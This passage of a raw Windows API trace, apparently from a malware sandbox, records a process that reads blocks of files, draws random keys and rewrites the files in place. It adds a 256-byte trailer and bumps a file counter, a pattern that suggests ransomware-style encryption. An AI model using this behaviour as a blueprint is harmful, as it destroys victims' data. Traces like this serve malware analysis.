RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.784] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.784] GetProcessHeap () returned 0x4f10000 [0083.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.785] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.785] GetProcessHeap () returned 0x4f10000 [0083.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.786] GetProcessHeap () returned 0x4f10000 [0083.786] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.787] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.787] GetProcessHeap () returned 0x4f10000 [0083.788] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.788] GetProcessHeap () returned 0x4f10000 [0083.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.788] GetProcessHeap () returned 0x4f10000 [0083.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.788] GetProcessHeap () returned 0x4f10000 [0083.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.788] GetProcessHeap () returned 0x4f10000 [0083.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.788] GetProcessHeap () returned 0x4f10000 [0083.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.788] SetFilePointerEx (in: hFile=0x95c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.788] WriteFile (in: hFile=0x95c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.788] WriteFile (in: hFile=0x95c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.788] GetProcessHeap () returned 0x4f10000 [0083.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.788] GetProcessHeap () returned 0x4f10000 [0083.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.788] GetProcessHeap () returned 0x4f10000 [0083.788] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.788] CloseHandle (hObject=0x95c) returned 1 [0083.791] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 119 [0083.791] SetFilePointerEx (in: hFile=0x960, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.791] ReadFile (in: hFile=0x960, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.791] SetFilePointerEx (in: hFile=0x960, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.791] GetProcessHeap () returned 0x4f10000 [0083.791] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.791] GetProcessHeap () returned 0x4f10000 [0083.791] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.791] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.791] GetProcessHeap () returned 0x4f10000 [0083.791] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.791] ReadFile (in: hFile=0x960, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.839] SetFilePointerEx (in: hFile=0x960, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.839] WriteFile (in: hFile=0x960, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.839] GetProcessHeap () returned 0x4f10000 [0083.839] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.839] GetProcessHeap () returned 0x4f10000 [0083.839] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.839] GetProcessHeap () returned 0x4f10000 [0083.839] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.839] GetProcessHeap () returned 0x4f10000 [0083.839] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.839] GetProcessHeap () returned 0x4f10000 [0083.839] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.839] GetProcessHeap () returned 0x4f10000 [0083.839] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.839] GetProcessHeap () returned 0x4f10000 [0083.839] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.840] GetProcessHeap () returned 0x4f10000 [0083.840] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.841] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.841] GetProcessHeap () returned 0x4f10000 [0083.842] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.842] GetProcessHeap () returned 0x4f10000 [0083.842] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.843] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.843] GetProcessHeap () returned 0x4f10000 [0083.844] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.844] GetProcessHeap () returned 0x4f10000 [0083.844] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.844] SetFilePointerEx (in: hFile=0x960, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.844] WriteFile (in: hFile=0x960, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.844] WriteFile (in: hFile=0x960, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.844] GetProcessHeap () returned 0x4f10000 [0083.844] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.844] GetProcessHeap () returned 0x4f10000 [0083.844] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.844] GetProcessHeap () returned 0x4f10000 [0083.844] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.844] CloseHandle (hObject=0x960) returned 1 [0083.845] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 120 [0083.845] SetFilePointerEx (in: 